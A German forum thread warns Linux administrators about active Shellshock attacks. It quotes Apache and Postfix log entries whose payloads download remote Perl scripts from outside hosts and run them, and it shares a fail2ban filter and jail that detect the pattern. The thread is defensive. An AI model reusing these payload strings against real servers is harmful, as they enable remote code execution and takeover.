Massive Shellshock-Angriffe auf LinuxServer

  • Liebe Community,


    jeder von euch der einen Linux-Server mit Anbindung ans Weltweite Wirr Warr haben sollte und immer noch nicht die Bash auf aktuellen Stand gebracht haben sollte, der muss bereits damit rechnen, das seine Maschiene ein "Zombie" ist. Die Bash ermöglicht es in Variablen Funktionen zu definieren. Durch die Sicherheitslücke kann nach der Auswertung solcher Variablen ungeprüft Programmcode ausgeführt werden.


    Diese Sicherheitslücke wird bereits massiv ausgenutzt, wie man unschwer in meinen Apache-Logfiles sehen kann.


    0.0.0.0 - - [27/Oct/2014:16:17:21 +0100] "GET /cgi-bin/hello.cgi HTTP/1.1" 404 477 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/muie.png boeser-server.com/js/nice.png;perl /var/tmp/muie.png\""


    Man hält es nicht für möglich, aber auch Postserver sind in Gefahr, wie die Logeinträge des Postservers meiner Firma zeigen.


    Oct 24 12:05:27 blah-bumm postfix/smtpd[2362]: warning: non-SMTP command from boeser.server.com[0.0.0.0]: To:() { :; }; wget 0.0.0.0/e.txt -O /tmp/e.txt;perl /tmp/e.txt 0.0.0.0 443;


    Freunde und Bekannte berichten ebenfalls von massiven Angriffen, also macht eure Hütten dicht!!!


    Mehr Informationen und wie ihr euren Server schützen könnt, gibt es auf Wikipedia


    Ebenfalls könnt ihr dort auch lesen, wie ihr eine Prüfung durchführen könnt, ob euer Server verwundbar ist.


    Aus Sicherheitsgründen wurden IP's und DNS von mir verfälscht...


    Edit: und doch noch eine IP übersehen... :(

  • Obwohl ich mir einbilde das mein Server sicher ist, so bleibt dennoch ein ungutes Gefühl. Deswegen hab ich einen Filter für fail2ban definiert.


    shellshock.conf zum Schutz für http und https


    Code
    # Fail2Ban filter to block web shellshock
    #
    # [Definition]
    failregex = <HOST>.*\(\) \{ :;\};
                     <HOST>.*\(\) \{ :; \};
    ignoreregex =


    Sicher nicht perfekt, aber es funzt...


    jail.conf

    Code
    [shellshock-http]
    enabled   = true
    port         = http,https
    filter        = shellshock
    maxretry = 1
    logpath    = /var/log/apache*/access*log


    Einen Filter für Postfix liefere ich noch nach...


    Was ist Fail2ban?

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!